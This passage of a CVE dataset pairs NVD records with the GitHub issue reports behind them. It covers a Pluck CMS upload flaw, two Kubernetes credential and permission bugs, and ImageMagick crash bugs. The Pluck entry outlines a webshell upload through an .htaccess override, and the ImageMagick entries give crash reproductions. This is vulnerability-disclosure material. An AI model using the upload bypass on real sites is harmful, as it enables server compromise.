"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/pluck-cms/pluck/issues/72"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DFF082EE-B695-400E-BF54-FC8707FBBE3E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/pluck-cms/pluck/issues/72 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"pluck-cms",
"pluck"
] | Location: https://github.com/pluck-cms/pluck/blob/master/data/inc/files.php#L40
Code:
```php
<?php
// ......
$blockedExtentions = array('.php','php3','php4','php5','php6','php7','phtml');
if (in_array($lastfour, $blockedExtentions) or in_array($lastfive, $blockedExtentions) ){
if (!rename('files/'.latinOnlyInput($_FILES['filefile']['name']), 'files/'.latinOnlyInput($_FILES['filefile']['name']).'.txt')){
show_error($lang['general']['upload_failed'], 1);
}
chmod('files/'.latinOnlyInput($_FILES['filefile']['name']).'.txt', 0775);
}else{
chmod('files/'.latinOnlyInput($_FILES['filefile']['name']), 0775);
}
// ......
?>
```
When the uploaded file hits the suffix in `$blockedExtentions`, the file will be renamed to `.{ext}.txt`, and missed `$blockedExtentions` will not be renamed. So you can upload a webshell by overriding the `.htaccess` file.
**Step1. Upload a file `.htaccess`**
File content:
![image](https://camo.githubusercontent.com/07a7b72a77546f7ff278f63e27e0da6083d7d187/68747470733a2f2f73322e617831782e636f6d2f323031392f30342f30392f416f644131492e706e67)
**Step2. Upload file `phpinfo.txt`**
File content:
![image](https://camo.githubusercontent.com/2428c246e5b6dcd59f997f93552752d371960788/68747470733a2f2f73322e617831782e636f6d2f323031392f30342f30392f416f646b39412e706e67)
**Step3. Request**
![getshell](https://camo.githubusercontent.com/a6d95387a64b44819f19b20d10da6f46ac7bc221/68747470733a2f2f73322e617831782e636f6d2f323031392f30342f30392f416f644563742e706e67) | file-upload vulnerability in data/inc/files.php | https://api.github.com/repos/pluck-cms/pluck/issues/72/comments | 4 | 2019-04-09T14:45:54Z | 2019-05-29T16:19:45Z | https://github.com/pluck-cms/pluck/issues/72 | 431,009,393 | 72 |
CVE-2019-11243 | 2019-04-22T15:29:00.790 | In Kubernetes v1.12.0-v1.12.4 and v1.13.0, the rest.AnonymousClientConfig() method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the affected versions, rest.AnonymousClientConfig() did not effectively clear service account credentials loaded using rest.InClusterConfig() | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.6,
"impactScore": 1.4,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108053"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/76797"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190509-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA1909D3-D45E-4AD4-B773-51ADCFC63113",
"versionEndExcluding": null,
"versionEndIncluding": "1.12.4",
"versionStartExcluding": null,
"versionStartIncluding": "1.12.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:1.13.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E277E5AC-48ED-4993-9D3F-F0551E70BBE0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:trident:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5D9A34F5-AC03-4098-A37D-AD50727DDB11",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/kubernetes/kubernetes/issues/76797 | [
"Third Party Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
The `rest.AnonymousClientConfig()` method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data).
In the following versions, `rest.AnonymousClientConfig()` did not effectively clear service account credentials loaded using `rest.InClusterConfig()`:
* v1.12.0-v1.12.4
* v1.13.0
**What is the impact?**
* `k8s.io/client-go` users that use the `rest.AnonymousClientConfig()` method directly with client config loaded with `rest.InClusterConfig()` receive back a client config which can still send the loaded service account token with requests.
**How was the issue fixed?**
* In 1.12.5+ and 1.13.1+, `rest.InClusterConfig()` was modified to return a client config that is safe to use with the `rest.AnonymousClientConfig()` method (https://github.com/kubernetes/kubernetes/pull/71713)
* In v1.15.0, the `rest.AnonymousClientConfig()` will also exclude the `config.Transport` and `config.WrapTransport` fields, in addition to the explicit credential-carrying fields. (https://github.com/kubernetes/kubernetes/pull/75771)
**How do I resolve the issue?**
* Upgrade `k8s.io/client-go` to `kubernetes-1.12.5`, `kubernetes-1.13.1`, `kubernetes-1.14.0`, or higher
* or manually clear the `config.WrapTransport` and `config.Transport` fields in addition to calling `rest.AnonymousClientConfig()`
Thanks to Oleg Bulatov of Red Hat for reporting this issue.
/area security
/kind bug
/sig auth
/sig api-machinery
/assign
/close | CVE-2019-11243: v1.12.0-v1.12.4, v1.13.0: rest.AnonymousClientConfig() does not remove the serviceaccount credentials from config created by rest.InClusterConfig() | https://api.github.com/repos/kubernetes/kubernetes/issues/76797/comments | 2 | 2019-04-18T21:31:53Z | 2022-05-16T21:59:22Z | https://github.com/kubernetes/kubernetes/issues/76797 | 434,967,981 | 76,797 |
CVE-2019-11244 | 2019-04-22T15:29:00.837 | In Kubernetes v1.8.x-v1.14.x, schema info is cached by kubectl in the location specified by --cache-dir (defaulting to $HOME/.kube/http-cache), written with world-writeable permissions (rw-rw-rw-). If --cache-dir is specified and pointed at a different location accessible to other users/groups, the written files may be modified by other users/groups and disrupt the kubectl invocation. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 1.9000000000000001,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.4,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 2.5,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.3,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108064"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3942"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0020"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0074"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/76676"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190509-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A57F3AC4-5E09-4C16-91A7-80D54F8F968C",
"versionEndExcluding": null,
"versionEndIncluding": "1.14.1",
"versionStartExcluding": null,
"versionStartIncluding": "1.8.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:trident:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5D9A34F5-AC03-4098-A37D-AD50727DDB11",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/kubernetes/kubernetes/issues/76676 | [
"Third Party Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | In kubectl v1.8.0+, schema info is cached in the location specified by `--cache-dir` (defaulting to `$HOME/.kube/http-cache`), written with world-writeable permissions (rw-rw-rw-).
If `--cache-dir` is specified and pointed at a different location accessible to other users/groups, the written files may be modified by other users/groups and disrupt the kubectl invocation.
CVSS score: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N (3.3, low)
**What versions are affected?**
kubectl v1.8.0+
**What configurations are affected?**
Invocations that point `--cache-dir` at world-writeable locations
**Impact**
Malformed responses written to the cache directory can disrupt the kubectl invocation
**Workaround**
Use the default `--http-cache` location in the $HOME directory or point it at a directory that is only accessible to desired users/groups.
(original description follows) ====
What happened: The files inside of ".kube/http-cache" are world writeable (rw-rw-rw-). While the default for these files appears to be the home directory, using the "--cache-dir" flag could put these files into a place where world writeable files would allow any user / process to modify the cache files. Modification of the cache files could influence the kubectl utility in a negative way for other users.
What you expected to happen: Apply stricter file permissions to the http-cache files.
How to reproduce it (as minimally and precisely as possible): Run any generic kubectl command which is successful and then list the cache directory ~/.kube/http-cache/*
$ kubectl get pods --all-namespaces
$ ls -la ~/.kube/http-cache/*
Anything else we need to know?: I estimate this is a low severity security issue with a CVSS score of "3.3 / CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Environment: Linux
Kubernetes version (use kubectl version):Client Version: version.Info{Major:"1", Minor:"12", GitVersion:"v1.12.6", GitCommit:"ab91afd7062d4240e95e51ac00a18bd58fddd365", GitTreeState:"clean", BuildDate:"2019-02-26T12:49:28Z", GoVersion:"go1.10.8", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"12", GitVersion:"v1.12.6", GitCommit:"ab91afd7062d4240e95e51ac00a18bd58fddd365", GitTreeState:"clean", BuildDate:"2019-02-26T12:49:28Z", GoVersion:"go1.10.8", Compiler:"gc", Platform:"linux/amd64"}
Cloud provider or hardware configuration: AWS. Running kube api server in hyperkube.
OS (e.g: cat /etc/os-release):
NAME="CentOS Linux"
VERSION="7.1808 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7.1808 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
OSTREE_VERSION=7.1808
Kernel (e.g. uname -a): Linux hackit.internal 3.10.0-862.11.6.el7.x86_64 #1 SMP Tue Aug 14 21:49:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Install tools: Manual installation.
Others: n/a
| CVE-2019-11244: `kubectl --http-cache=<world-accessible dir>` creates world-writeable cached schema files | https://api.github.com/repos/kubernetes/kubernetes/issues/76676/comments | 12 | 2019-04-16T20:14:25Z | 2022-10-14T02:06:00Z | https://github.com/kubernetes/kubernetes/issues/76676 | 433,964,918 | 76,676 |
CVE-2019-11470 | 2019-04-23T14:29:00.600 | The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/e3cdce6fe12193f235b8c0ae5efe6880a25eb957"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1472"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00028.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-26:q16:*:*:*:*:*:*",
"matchCriteriaId": "64AB3C42-4698-4E94-9A4A-F75BA34C7213",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1472 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
Cineon image may be mistakenly parsed with incorrect pixel information, causing converting to take too much CPU resource.
### Steps to Reproduce
convert c.cin /tmp/test.tmp
```
work/imagemagick > gdb --args ./ImageMagick-orig/install/bin/convert ./convert-report/c.cin /tmp/test.bmp
Reading symbols from ./ImageMagick-orig/install/bin/convert...done.
gdb$ run
Starting program: /home/ubuntu/work/imagemagick/ImageMagick-orig/install/bin/convert ./convert-report/c.cin /tmp/test.bmp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
^C
Program received signal SIGINT, Interrupt.
SetImageBackgroundColor (image=0x63aab0, exception=0x6244d0) at MagickCore/image.c:2464
2464 q+=GetPixelChannels(image);
gdb$ b MagickCore/image.c:2464
Breakpoint 1 at 0x7ffff777ed88: file MagickCore/image.c, line 2464.
gdb$ p image->columns
$1 = 0x40002
gdb$ p image->Quitmns
gdb$ display image->columns
1: image->columns = 0x40002
gdb$ display image->rows
2: image->rows = 0x70000
gdb$ display x
3: x = 0x1bd43
gdb$ display y
4: y = 0x21d
gdb$ c 100
Not stopped at any breakpoint; argument ignored.
Continuing.
Breakpoint 1, SetImageBackgroundColor (image=0x63aab0, exception=0x6244d0) at MagickCore/image.c:2464
2464 q+=GetPixelChannels(image);
1: image->columns = 0x40002
2: image->rows = 0x70000
3: x = 0x1bd44
4: y = 0x21d
gdb$ c 100
Will ignore next 255 crossings of breakpoint 1. Continuing.
Breakpoint 1, SetImageBackgroundColor (image=0x63aab0, exception=0x6244d0) at MagickCore/image.c:2464
2464 q+=GetPixelChannels(image);
1: image->columns = 0x40002
2: image->rows = 0x70000
3: x = 0x1be44
4: y = 0x21d
gdb$ c 1000
Will ignore next 4095 crossings of breakpoint 1. Continuing.
Breakpoint 1, SetImageBackgroundColor (image=0x63aab0, exception=0x6244d0) at MagickCore/image.c:2464
2464 q+=GetPixelChannels(image);
1: image->columns = 0x40002
2: image->rows = 0x70000
3: x = 0x1ce44
4: y = 0x21d
```
[cin.zip](https://github.com/ImageMagick/ImageMagick/files/2830725/cin.zip)
### System Configuration
- ImageMagick version:7.0.8-26 Q16 x86_64 2019-02-05 (6b3bdb65b)
- Environment (Operating system, version and so on): Ubuntu 18.04 x86_64
- Additional information: Version 6.9.7-4 Q16 x86_64 20170114 seems fine with error message "width or height exceeds limit `c.cin'".
<!-- Thanks for reporting the issue to ImageMagick! -->
| Incorrect parsing Cineon causing `convert` to take ridiculous time | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1472/comments | 7 | 2019-02-05T04:29:35Z | 2019-04-23T16:45:43Z | https://github.com/ImageMagick/ImageMagick/issues/1472 | 406,625,350 | 1,472 |
CVE-2019-11472 | 2019-04-23T14:29:00.837 | ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1546"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/f663dfb8431c97d95682a2b533cca1c8233d21b4"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*",
"matchCriteriaId": "34C2A939-19C7-4BC0-8DE5-E3D612C99B0E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1546 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
When using `identify -verbose $FILE` on XWD files, it may emit FPE errors at multiple locations.
### Steps to Reproduce
* run `identify -verbose $FILE`
* ASAN messages may be like:
fpe_xwd.c:490_1.xwd
```
ASAN:DEADLYSIGNAL
=================================================================
==19029==ERROR: AddressSanitizer: FPE on unknown address 0x7f0623a03210 (pc 0x7f0623a03210 bp 0x000000000000 sp 0x7ffc86dbd220 T0)
#0 0x7f0623a0320f (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x2720f)
#1 0x7f0627deb295 in ReadXWDImage coders/xwd.c:490
#2 0x7f06276d4854 in ReadImage MagickCore/constitute.c:547
#3 0x7f06276d778b in ReadImages MagickCore/constitute.c:917
#4 0x7f0626f69817 in IdentifyImageCommand MagickWand/identify.c:321
#5 0x7f0626ffdde0 in MagickCommandGenesis MagickWand/mogrify.c:184
#6 0x55c1ef27bf00 in MagickMain utilities/magick.c:149
#7 0x55c1ef27c186 in main utilities/magick.c:180
#8 0x7f062675ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#9 0x55c1ef27b979 in _start (/home/hongxu/work/imagemagick/ImageMagick-asan/install/bin/magick+0x1979)
```
fpe_xwd.c:520_1.xwd
```
ASAN:DEADLYSIGNAL
=================================================================
==28450==ERROR: AddressSanitizer: FPE on unknown address 0x7f20a562e210 (pc 0x7f20a562e210 bp 0x000000000000 sp 0x7ffd19f36b80 T0)
#0 0x7f20a562e20f (/usr/lib/x86_64-linux-gnu/libX11.so.6+0x2720f)
#1 0x7f20a9a166c9 in ReadXWDImage coders/xwd.c:520
#2 0x7f20a92ff854 in ReadImage MagickCore/constitute.c:547
#3 0x7f20a930278b in ReadImages MagickCore/constitute.c:917
#4 0x7f20a8b94817 in IdentifyImageCommand MagickWand/identify.c:321
#5 0x7f20a8c28de0 in MagickCommandGenesis MagickWand/mogrify.c:184
#6 0x55b4ed9adf00 in MagickMain utilities/magick.c:149
#7 0x55b4ed9ae186 in main utilities/magick.c:180
#8 0x7f20a8385b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#9 0x55b4ed9ad979 in _start (/home/hongxu/work/imagemagick/ImageMagick-asan/install/bin/magick+0x1979)
```
### System Configuration
- ImageMagick version:7.0.8-41 Q16 x86_64 2019-04-14
- Environment (Operating system, version and so on): Ubuntu 18.04 LTS, x84_64
- Additional information: This was firstly detected in GraphicsMagick, but I found this also happens in ImageMagick 6/7.
POCs:
[im.zip](https://github.com/ImageMagick/ImageMagick/files/3077110/im.zip)
| FPE errors when reading XWD images | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1546/comments | 2 | 2019-04-14T07:21:12Z | 2019-04-24T01:24:42Z | https://github.com/ImageMagick/ImageMagick/issues/1546 | 432,941,385 | 1,546 |
CVE-2019-11597 | 2019-04-29T16:29:00.407 | In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
